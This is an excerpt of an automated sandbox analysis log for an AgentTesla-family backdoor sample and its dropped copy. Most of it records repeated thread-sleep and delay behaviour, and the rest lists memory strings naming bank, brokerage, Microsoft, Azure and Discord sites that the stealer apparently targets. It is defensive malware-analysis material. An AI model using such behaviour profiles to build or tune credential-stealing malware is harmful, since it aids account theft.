Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -597562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -597453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -597343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -597234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -597125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -597015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -596905s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -596796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -596687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -596578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -596468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -596358s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -596250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -596140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -596031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -595922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -595812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -595703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -595593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -595483s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -595357s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -595187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -595059s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -594953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -594843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -594734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -594625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -594515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -594404s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -594296s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -594187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -594077s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 2848	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep count: 39 > 30
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -35971150943733603s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 6684	Thread sleep count: 3474 > 30
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -599889s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 6684	Thread sleep count: 6364 > 30
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -599672s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -599546s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -599437s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -599084s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -598953s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -598843s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -598734s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -598623s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -598513s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -598405s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -598296s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -598186s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -598077s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -597967s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -597856s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -597749s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -597640s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -597530s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -597422s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -597312s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -597203s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -597093s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -596984s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -596875s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -596765s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -596656s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -596547s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -596422s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -596312s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -596203s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -596094s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -595969s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -595859s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -595750s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -595639s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -595531s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -595420s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -595312s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -595203s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -595093s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -594984s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -594875s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -594764s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -594656s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -594546s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -594436s >= -30000s
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe TID: 5716	Thread sleep time: -594328s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 598999	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 598889	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 598070	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 597800	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 597671	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 597343	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 597015	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 596905	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 596796	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 596468	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 596358	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 596140	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 595593	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 595483	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 595357	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 595059	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 594515	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 594404	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 594296	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 594187	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 594077	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 599889
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 599546
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 599084
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 598953
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 598843
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 598734
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 598623
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 598513
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 598405
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 598296
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 598186
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 598077
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 597967
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 597856
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 597749
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 597640
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 597530
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 597422
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 597312
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 597203
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 597093
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 596984
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 596875
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 596765
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 596656
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 596547
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 596422
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 596312
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 596203
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 596094
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 595969
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 595859
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 595750
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 595639
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 595531
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 595420
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 595312
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 595203
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 595093
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 594984
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 594875
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 594764
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 594656
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 594546
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 594436
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 594328

Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4587969817.0000000000CD6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
